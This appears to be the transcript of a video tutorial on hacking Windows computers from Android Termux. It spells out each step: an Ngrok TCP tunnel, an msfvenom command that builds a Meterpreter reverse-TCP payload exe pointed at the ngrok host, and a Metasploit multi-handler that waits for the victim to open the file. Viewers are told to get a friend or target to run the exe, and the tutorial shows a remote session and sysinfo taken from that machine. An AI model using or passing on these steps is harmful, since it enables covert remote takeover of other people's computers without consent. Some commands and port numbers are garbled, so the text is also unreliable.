Now using Ngrok and Metasploit, I will teach you how to hack Windows devices. As usually we do our package update and package upgrade, and after that the process here is first we will be running our Ngrok. The secure tunneling will be running in one session, and we will be running our Metasploit in another session. So when the Windows devices accepts or opens our payload exe file, then our Ngrok listens to that and creates a connection between the Windows device and our Android Termux. So let's see how it is does. Ngrok port 444. The port 444 you can give any number. I have given port 444. As you can see, now our Ngrok is running. It is a TCP connection. So you can see it, tcp.ngrok.io, and the port here is 16661, a local port, and this is our local host number 4444, which we have given it before. So the Ngrok is running and is waiting for connections in to receive. So remember our local host, it is 444. If you have given it with any other number, please remember that number because we will be using it later in Metasploit. Now we'll create a new session. In this new session we'll be running our Metasploit framework. So let's start it. cd Metasploit framework. We'll be moving into the directory. Let us see what files are there. ls, you can see that, and enter the command as I have given here: ruby msf venom p windows metapreter reverse tcp lhost, and the lhost is the same number which you have given before. See here, you have given lhost is that number, that 0.tcp.ngrok.io 1661. Copy this number. So lhost is that link, 0.tcp.ngrok. lport is that number, fexe r sd card windows hack.exe. that sd card windows hack.exe is the destination where you want to initialize your windows hack.exe file. Windows hack is the file name. You can give it anything you want. Now run the command. It will take a time to create it based on the RAM and hardware specifications of your device. So in the meanwhile, I'll tell you what it is. The MS Venom creates a payload. -p is the payload for Windows operating system using a metapreter of reverse TCP method using a lhost of 0.tcp.ngrok.io, that is where the port is forwarding, and the lport number is 1661, which has been running Ngrok in it, and exe is the file extension, and -r is the writable to where the location. So the final size of the exe file is the bytes you can see, and it is created. Now we'll find where it is. See here it windows hack.exe is created. Now all you have to do is send that windows.exe file to the Windows device which you want to hack. Copy this file and paste it in that device. See that your friend or your person whom you want to hack opens that file, and once he opens that file sends a reverse TCP connection to our Android device. Now run msf console. The msf console is starting. Yeah, now it is running. Now type the commands in the right order. Use exploit multi-handler. Now we'll be setting our payload Windows Metasploit reverse TCP. Now we'll be setting our L host, which is 127.0.0.1, which is our INET or IP address. In the previous video I told you how to find it. Now set our L port. L port is the same number which we have given during the Ngrok, so I told you to remember it. We will be doing it, using it here before, and we'll start exploit. Now this will start listening to the connections which are coming from that exe file. If our client or the user whom we want to hack opens that exe file, there will be a reverse connection from that, and this will be scanning all the reverse connections from that exe file. As you can see here, a Metasploit session 1 has opened to the same port on the particular date. Now the Metasploit is working. Now there are a lot of commands which you can use to remotely use our Windows device. You can see in that Metasploit and MS console in internet. Now I will be pressing sysinfo. This sysinfo is the information of the particular Windows device which I am hacking now. As you can see, it has remotely taken the data from the computer and sent to us. You can do a lot of things, not only this. Please go through this in the internet. You can find many things on how to remotely use a Windows machine using this Metasploit. See you in the next video.